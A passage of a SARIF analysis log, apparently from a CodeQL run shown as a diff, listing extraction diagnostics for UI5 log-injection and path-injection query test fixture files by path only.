: "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 173 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 174 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 177 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 178 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 182 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 183 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 186 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 187 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 190 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 191 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 194 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 195 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 196 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 198 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 199 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", - "uriBaseId" : "%SRCROOT%", - "index" : 200 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 201 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 203 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 205 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 207 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 208 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 211 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 212 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 213 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 215 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 217 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 218 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 221 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 224 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 225 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 226 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 229 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 230 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 232 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 233 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", 